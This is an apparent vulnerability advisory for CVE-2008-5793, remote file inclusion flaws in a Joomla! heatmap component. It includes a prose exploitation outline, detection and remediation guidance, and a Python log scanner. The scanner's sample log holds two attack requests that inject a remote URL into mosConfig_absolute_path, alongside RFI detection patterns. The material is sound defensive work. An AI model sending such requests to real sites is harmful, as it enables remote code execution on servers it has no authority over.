CVE-2008-5793

Source: cve@mitre.org

MEDIUM
6.8
Published: December 31, 2008 at 11:30 AM
Modified: April 9, 2025 at 12:30 AM

Vulnerability Description

Multiple PHP remote file inclusion vulnerabilities in the Clickheat - Heatmap stats (com_clickheat) component 1.0.1 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) install.clickheat.php, (b) Cache.php and (c) Clickheat_Heatmap.php in Recly/Clickheat/, and (d) Recly/common/GlobalVariables.php; and the (2) mosConfig_absolute_path parameter to (e) _main.php and (f) main.php in includes/heatmap, and (g) includes/overview/main.php.

CVSS Metrics

Base Score
6.8
Severity
MEDIUM
Vector String
AV:N/AC:M/Au:N/C:P/I:P/A:P

Weaknesses (CWE)

Source: nvd@nist.gov

AI Security Analysis

01 // Technical Summary

Clickheat, a Joomla! component, is vulnerable to multiple remote file inclusion (RFI) flaws. Attackers can leverage these vulnerabilities to execute arbitrary PHP code on the server, potentially leading to complete system compromise and data exfiltration.

02 // Vulnerability Mechanism

Step 1: Target Identification: The attacker identifies a Joomla! website using the Clickheat component (version 1.0.1).

Step 2: Payload Preparation: The attacker crafts a malicious PHP script, hosted on a server they control. This script could be designed to create a reverse shell, steal data, or perform other malicious actions.

Step 3: Payload Delivery: The attacker sends a specially crafted HTTP request to the vulnerable Joomla! website. The request targets one of the vulnerable files (e.g., install.clickheat.php, Cache.php, Clickheat_Heatmap.php, _main.php, main.php, or includes/overview/main.php). The request includes a URL in the mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameter, pointing to the attacker's malicious PHP script.

Step 4: Code Execution: The vulnerable Clickheat component, due to the lack of input validation, attempts to include the URL provided in the parameter. This causes the attacker's PHP script to be executed on the server.

Step 5: System Compromise: The attacker's PHP script executes, potentially granting them a shell, allowing them to upload and execute further malicious code, or exfiltrate sensitive data.

03 // Deep Technical Analysis

The vulnerability stems from insufficient input validation and sanitization within the Clickheat component. Specifically, the code fails to validate the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] parameters, which are used to build the path passed to PHP's file-inclusion functions. An attacker can therefore supply a URL pointing to a PHP script hosted on a remote server; when the component includes that URL, the attacker's code runs in the context of the web server process and inherits its access to the server's resources. The root cause is the use of user-supplied input in file inclusion operations without sanitization, which is what turns a configuration parameter into arbitrary code execution.

04 // Exploitation Status

Public PoC. The vulnerability is well-documented, and readily available exploits exist. While the component is old, it's possible that legacy systems are still vulnerable. The age of the vulnerability makes it less likely to be actively exploited in the wild, but the ease of exploitation and potential impact make it a significant risk if unpatched.

05 // Threat Intelligence

While no specific APT groups are directly linked to this vulnerability, the ease of exploitation makes it attractive to a wide range of attackers, including script kiddies and opportunistic attackers. The potential for complete system compromise makes it a valuable target.

CISA KEV status: Not Listed

06 // Detection & Hunting

  • Web server logs: Examine access logs for suspicious HTTP requests containing URLs in the mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameters, especially those targeting the vulnerable files.

  • Intrusion Detection Systems (IDS): Implement rules to detect attempts to exploit the RFI vulnerability, looking for patterns in HTTP requests.

  • File Integrity Monitoring (FIM): Monitor critical system files for unauthorized modifications, especially those related to the Clickheat component.

  • Network Traffic Analysis: Analyze network traffic for unusual outbound connections from the web server, which could indicate a reverse shell or data exfiltration.
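Detection logic for the web-server-log bullet above, as an added example that is not part of the original record: it parses combined-format access-log lines (a constructed sample is embedded), flags requests whose mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameter carries a URL rather than a local path, and notes whether the requested file is one named in the CVE description. The IP addresses and payload host are constructed test values.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Basenames of the component files named in the CVE-2008-5793 description.
VULNERABLE_FILES = {"install.clickheat.php", "Cache.php", "Clickheat_Heatmap.php",
                    "GlobalVariables.php", "_main.php", "main.php"}
SUSPECT_PARAMS = {"mosConfig_absolute_path", "GLOBALS[mosConfig_absolute_path]"}

# Combined-log prefix: client, identd, user, [timestamp], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
URL_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://')

def is_remote_include(value):
    """True when a parameter value is a URL (any scheme://), i.e. a remote-include attempt.
    parse_qs decodes once already; decoding again also catches double-encoded values."""
    return bool(URL_RE.match(unquote(value).strip().lower()))

def analyze_line(line):
    """Return a finding dict for one access-log line, or None if it is not an RFI attempt."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = [(name, v) for name, values in parse_qs(parts.query).items()
            if name in SUSPECT_PARAMS for v in values if is_remote_include(v)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": parts.path,
            "status": int(m.group("status")), "params": hits,
            "targets_clickheat_file": parts.path.rsplit("/", 1)[-1] in VULNERABLE_FILES}

def scan(log_text):
    """Run analyze_line over every line of a log and collect the findings."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]

# Constructed sample log (not real traffic): two RFI attempts (one URL-encoded, one plain),
# one benign request whose parameter holds a local path, and one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2009:03:14:15 +0000] "GET /components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS%5BmosConfig_absolute_path%5D=http%3A%2F%2F198.51.100.9%2Fx.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Jan/2009:03:14:16 +0000] "GET /components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=http://198.51.100.9/x.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.44 - - [10/Jan/2009:03:20:01 +0000] "GET /index.php?option=com_clickheat&mosConfig_absolute_path=/var/www/joomla HTTP/1.1" 200 9321 "-" "Mozilla/5.0"
192.0.2.45 - - [10/Jan/2009:03:21:09 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 14422 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], f["path"], f["params"],
              "clickheat-file" if f["targets_clickheat_file"] else "")
```

A 200 status on a flagged request does not by itself confirm the include succeeded; treat it as a trigger to check the component files and outbound connections from the host.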

07 // Remediation & Hardening

  • Upgrade: Update the Clickheat component to a patched version (if available). Since the component is old, this may not be possible. Consider removing the component if it is no longer needed.

  • Input Validation: Implement robust input validation and sanitization to prevent malicious code injection. Ensure that the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] parameters are properly validated before use.

  • File Inclusion Restrictions: Restrict what include and require may load. In PHP, disable remote inclusion by setting allow_url_include=Off (and allow_url_fopen=Off where the application does not need it), so a URL in a parameter cannot be included at all; where inclusion of user-influenced paths is unavoidable, confine them to an allow-list of known paths and file extensions rather than building the path from request data.

  • Web Application Firewall (WAF): Deploy a WAF to filter malicious requests and block attempts to exploit the RFI vulnerability.

  • Least Privilege: Ensure the web server runs with the least privileges necessary to perform its functions. This limits the impact of a successful exploit.

  • Regular Security Audits: Conduct regular security audits and penetration testing to identify and address vulnerabilities.

08 // Affected Products

Clickheat - Heatmap stats component 1.0.1 for Joomla!

09 // Discovered Proof of Concept Links
